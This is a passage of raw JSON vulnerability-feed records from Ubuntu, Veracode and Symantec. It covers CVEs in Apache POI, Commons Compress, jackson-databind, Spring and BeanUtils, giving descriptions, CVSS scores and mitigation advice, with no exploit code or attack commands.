"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-29T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12626", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-01-29T00:00:00", "id": "UB:CVE-2017-12626", "href": "https://ubuntu.com/security/CVE-2017-12626", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T14:12:52", "description": "Directory traversal vulnerability in Pivotal Spring Framework 3.x before\n3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files\nvia a crafted URL.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=760733>\n", "cvss3": {}, "published": "2015-02-19T00:00:00", "type": "ubuntucve", "title": "CVE-2014-3578", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2015-02-19T00:00:00", "id": "UB:CVE-2014-3578", "href": "https://ubuntu.com/security/CVE-2014-3578", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T13:49:15", "description": "When reading a specially crafted ZIP archive, the read method of Apache\nCommons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the\ncorrect EOF indication after the end of the stream has been reached. When\ncombined with a java.io.InputStreamReader this can lead to an infinite\nstream, which can be used to mount a denial of service attack against\nservices that use Compress' zip package.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906301>\n * <https://issues.apache.org/jira/browse/COMPRESS-463>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-16T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11771", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2018-08-16T00:00:00", "id": "UB:CVE-2018-11771", "href": "https://ubuntu.com/security/CVE-2018-11771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T13:42:10", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind\n2.0.0 through 2.9.10. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint and the\nservice has the commons-dbcp (1.4) jar in the classpath, and an attacker\ncan find an RMI service endpoint to access, it is possible to make the\nservice execute a malicious payload. This issue exists because of\norg.apache.commons.dbcp.datasources.SharedPoolDataSource and\norg.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941530>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T00:00:00", "type": "ubuntucve", "title": "CVE-2019-16942", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2019-10-01T00:00:00", "id": "UB:CVE-2019-16942", "href": "https://ubuntu.com/security/CVE-2019-16942", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T13:42:10", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind\n2.0.0 through 2.9.10. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint and the\nservice has the p6spy (3.8.6) jar in the classpath, and an attacker can\nfind an RMI service endpoint to access, it is possible to make the service\nexecute a malicious payload. This issue exists because of\ncom.p6spy.engine.spy.P6DataSource mishandling.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941530>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T00:00:00", "type": "ubuntucve", "title": "CVE-2019-16943", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2019-10-01T00:00:00", "id": "UB:CVE-2019-16943", "href": "https://ubuntu.com/security/CVE-2019-16943", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T13:44:46", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x\nbefore 2.9.9. When Default Typing is enabled (either globally or for a\nspecific property) for an externally exposed JSON endpoint, the service has\nthe mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an\nattacker can host a crafted MySQL server reachable by the victim, an\nattacker can send a crafted JSON message that allows them to read arbitrary\nlocal files on the server. This occurs because of missing\ncom.mysql.cj.jdbc.admin.MiniAdmin validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-17T00:00:00", "type": "ubuntucve", "title": "CVE-2019-12086", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-05-17T00:00:00", "id": "UB:CVE-2019-12086", "href": "https://ubuntu.com/security/CVE-2019-12086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:16:14", "description": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar\nin Apache Struts 1.x through 1.3.10 and in other products requiring\ncommons-beanutils through 1.9.2, does not suppress the class property,\nwhich allows remote attackers to \"manipulate\" the ClassLoader and execute\narbitrary code via the class parameter, as demonstrated by the passing of\nthis parameter to the getClass method of the ActionForm object in Struts 1.", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0114", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-04-30T00:00:00", "id": "UB:CVE-2014-0114", "href": "https://ubuntu.com/security/CVE-2014-0114", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T15:37:50", "description": "Apache poi is vulnerable to denial of service (DoS) attacks. Attackers can cause infinite loops, when parsing `WMF`, `EMF`, `MSG` and `macro` files. They can also cause Out-of-Memory (OOM) exceptions to occur when parsing `DOC`, `PPT` and `XLS` files.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-29T04:14:26", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2021-01-20T17:48:44", "id": "VERACODE:5760", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-5760/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T15:40:31", "description": "commons-compress is vulnerable to denial of service (DoS) attacks. The vulnerability exists due to the read method of `ZipArchiveInputStream` failing to return the correct `EOF` return code after reaching the end of the stream. This causes an infinite stream when used with `java.io.InputStreamReader`, and leads to a DoS attack.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-17T05:51:45", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2022-04-18T18:43:31", "id": "VERACODE:7319", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-7319/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T13:15:26", "description": "jackson-databind is vulnerable to remote code execution. The vulnerability exists as it does not stop classes from the `commons-dbcp` package from being used as deserialization gadgets.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-02T02:15:24", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2022-10-29T05:49:43", "id": "VERACODE:21602", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-21602/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:27:47", "description": "jackson-databind is vulnerable to remote code execution (RCE). The vulnerability exists as it does not stop classes from the `p6spy` package from being used as deserialization gadgets.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-02T02:25:49", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2022-10-29T05:48:15", "id": "VERACODE:21603", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-21603/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:55:19", "description": "jackson-databind is vulnerable to remote code execution (RCE) attacks. This is due to a polymorphic typing issue when Default Typing is enabled. An attacker can craft a malicious JSON to invoke `com.mysql.cj.jdbc.admin.MiniAdmin` class, allowing the attacker to host a MySQL server or read arbitrary local files on the server.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-21T02:21:56", "type": "veracode", "title": "Remote Code Execution (RCE) Through Deserialization", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2022-04-20T05:59:23", "id": "VERACODE:20298", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-20298/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "symantec": [{"lastseen": "2021-06-08T18:46:50", "description": "### Description\n\nApache POI is prone to multiple denial-of-service vulnerabilities. An attacker may exploit these issues to cause a denial-of-service condition, denying service to legitimate users. Versions prior to POI 3.17 are vulnerable.\n\n### Technologies Affected\n\n * Apache POI 0.1 \n * Apache POI 0.10.0 \n * Apache POI 0.11.0 \n * Apache POI 0.12.0 \n * Apache POI 0.13.0 \n * Apache POI 0.14.0 \n * Apache POI 0.2 \n * Apache POI 0.3 \n * Apache POI 0.4 \n * Apache POI 0.5 \n * Apache POI 0.6 \n * Apache POI 0.7 \n * Apache POI 1.0.0 \n * Apache POI 1.0.1 \n * Apache POI 1.0.2 \n * Apache POI 1.1.0 \n * Apache POI 1.2.0 \n * Apache POI 1.5 \n * Apache POI 1.5.1 \n * Apache POI 2.0 \n * Apache POI 2.5 \n * Apache POI 2.5.1 \n * Apache POI 3.0 \n * Apache POI 3.0.2 \n * Apache POI 3.1 \n * Apache POI 3.10.1 \n * Apache POI 3.13 \n * Apache POI 3.14 \n * Apache POI 3.15 \n * Apache POI 3.16 \n * Apache POI 3.2 \n * Apache POI 3.5 \n * Apache POI 3.6 \n * Apache POI 3.7 \n * Apache POI 3.8 \n * Apache POI 3.9 \n * Oracle Enterprise Repository 12.1.3.0.0 \n * Oracle Instantis EnterpriseTrack 17.1 \n * Oracle Instantis EnterpriseTrack 17.2 \n * Oracle Instantis EnterpriseTrack 17.3 \n * Oracle Primavera Gateway 17.12 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 15.1 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 15.2 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 15.2.18 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 16.1 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 16.2 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 16.2.18 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 17.1 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 17.12 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 17.12.12 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 17.12.14 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 18.1.0 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 18.8 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 18.8.11 \n * Oracle Primavera P6 Enterprise Project Portfolio Management 18.8.13 \n * Oracle Primavera Unifier 16.1 \n * Oracle Primavera Unifier 16.2 \n * Oracle Primavera Unifier 17.12 \n * Oracle Primavera Unifier 17.7 \n * Oracle Primavera Unifier 18.8 \n * Redhat JBoss Middleware Text-Only Advisories for MIDDLEWARE 1 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the potential damage that a successful exploit may achieve, run all nonadministrative software as a regular user with the least amount of privileges required to successfully operate.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "symantec", "title": "Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-12626"], "modified": "2018-01-26T00:00:00", "id": "SMNTC-102879", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102879", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-15T18:27:16", "description": "### Description\n\nFasterXML Jackson-databind is prone to a remote-code execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. FasterXML jackson-databind version 2.0.0 through 2.9.10 are vulnerable.\n\n### Technologies Affected\n\n * Cisco Webex Teams \n * Cloud Foundry UAA 63.0 \n * Cloud Foundry UAA 64.0 \n * Cloud Foundry UAA 72.0 \n * Cloud Foundry UAA 73.0.0 \n * Cloud Foundry UAA 73.3.0 \n * Cloud Foundry UAA 73.4.0 \n * Cloud Foundry UAA 73.4.2 \n * Cloud Foundry UAA 74.0.0 \n * Cloud Foundry UAA 74.3.0 \n * Cloud Foundry UAA 74.5.0 \n * Cloud Foundry UAA 74.6.0 \n * Cloud Foundry cf-deployment 0.35.0 \n * Cloud Foundry cf-deployment 0.36.0 \n * Cloud Foundry cf-deployment 10.0.0 \n * Cloud Foundry cf-deployment 10.1.0 \n * Cloud Foundry cf-deployment 11.0.0 \n * Cloud Foundry cf-deployment 11.1.0 \n * Cloud Foundry cf-deployment 12.2.0 \n * Cloud Foundry cf-deployment 12.3.0 \n * Cloud Foundry cf-deployment 12.4.0 \n * Cloud Foundry cf-deployment 12.5.0 \n * Cloud Foundry cf-deployment 12.6.0 \n * FasterXML jackson-databind 2.0.0 \n * FasterXML jackson-databind 2.3 \n * FasterXML jackson-databind 2.4 \n * FasterXML jackson-databind 2.5 \n * FasterXML jackson-databind 2.6 \n * FasterXML jackson-databind 2.6.7.1 \n * FasterXML jackson-databind 2.7 \n * FasterXML jackson-databind 2.7.9.1 \n * FasterXML jackson-databind 2.7.9.3 \n * FasterXML jackson-databind 2.7.9.4 \n * FasterXML jackson-databind 2.8 \n * FasterXML jackson-databind 2.8.10 \n * FasterXML jackson-databind 2.8.11 \n * FasterXML jackson-databind 2.8.11.1 \n * FasterXML jackson-databind 2.8.11.2 \n * FasterXML jackson-databind 2.8.7 \n * FasterXML jackson-databind 2.8.8 \n * FasterXML jackson-databind 2.8.8.1 \n * FasterXML jackson-databind 2.8.9 \n * FasterXML jackson-databind 2.9.0 \n * FasterXML jackson-databind 2.9.1 \n * FasterXML jackson-databind 2.9.10 \n * FasterXML jackson-databind 2.9.2 \n * FasterXML jackson-databind 2.9.3 \n * FasterXML jackson-databind 2.9.4 \n * FasterXML jackson-databind 2.9.5 \n * FasterXML jackson-databind 2.9.6 \n * FasterXML jackson-databind 2.9.7 \n * FasterXML jackson-databind 2.9.8 \n * FasterXML jackson-databind 2.9.9 \n * NetApp Active IQ Unified Manager for Linux 7.3 \n * NetApp Active IQ Unified Manager for VMware vSphere 9.5 \n * NetApp Active IQ Unified Manager for Windows 7.3 \n * NetApp OnCommand Workflow Automation \n * NetApp Service Level Manager \n * Oracle JD Edwards EnterpriseOne Orchestrator 9.2 \n * Oracle JD Edwards EnterpriseOne Tools 9.2 \n * Redhat Descision Manager 7 \n * Redhat Enterprise Linux 8 \n * Redhat JBoss A-MQ 6.0 \n * Redhat JBoss A-MQ Streaming \n * Redhat JBoss Data Grid 7 \n * Redhat JBoss Data Virtualization 6.0.0 \n * Redhat JBoss Enterprise Application Platform 7.0 \n * Redhat JBoss Fuse 6.0 \n * Redhat JBoss Fuse 7.0 \n * Redhat Jboss Bpm Suite 6.0.0 \n * Redhat Mobile Application Platform 4 \n * Redhat OpenShift Container Platform 3.10 \n * Redhat OpenShift Container Platform 3.11 \n * Redhat OpenShift Container Platform 3.9 \n * Redhat OpenShift Container Platform 4.1 \n * Redhat OpenShift Container Platform 4.2 \n * Redhat OpenStack Platform 10 \n * Redhat OpenStack Platform 13 \n * Redhat OpenStack Platform 14 \n * Redhat Openshift Application Runtimes \n * Redhat Process Automation 7 \n * Redhat Single Sign-On 7.0 \n * Redhat Software Collections \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf possible, block access to the server at the network perimeter. Allow only trusted computers and networks to have access to the resources.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor the network for suspicious requests. This may help detect attacks that try to exploit These and similar vulnerabilities. Audit all applicable logs regularly.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of a successful exploit, run the hosting webserver in a chrooted or jailed environment with the minimal amount of privileges required for functionality. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-09-27T00:00:00", "type": "symantec", "title": "FasterXML Jackson-databind CVE-2019-16943 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-16943"], "modified": "2019-09-27T00:00:00", "id": "SMNTC-111564", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111564", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T19:08:25", "description": "### Description\n\nOracle Communications Billing and Revenue Management is prone to a remote security vulnerability. The vulnerability can be exploited over the 'HTTP' protocol. The 'Billing Care' and 'Business Operations Center (jackson-databind)' components are affected. This vulnerability affects the following supported versions: 7.5, 12.0\n\n### Technologies Affected\n\n * Oracle Communications Billing and Revenue Management 12.0 \n * Oracle Communications Billing and Revenue Management 7.5 \n * Oracle NoSQL Database \n * Oracle Primavera Gateway 15.2 \n * Oracle Primavera Gateway 16.2 \n * Oracle Primavera Gateway 17.12 \n * Oracle Primavera Gateway 18.8 \n * Oracle Retail Xstore Point of Service 15.0 \n * Oracle Retail Xstore Point of Service 16.0 \n * Oracle Retail Xstore Point of Service 17.0 \n * Oracle Retail Xstore Point of Service 18.0 \n * Oracle Retail Xstore Point of Service 7.1 \n * Oracle WebCenter Portal 12.2.1.3.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-07-16T00:00:00", "type": "symantec", "title": "Oracle Communications Billing and Revenue Management CVE-2019-12086 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": 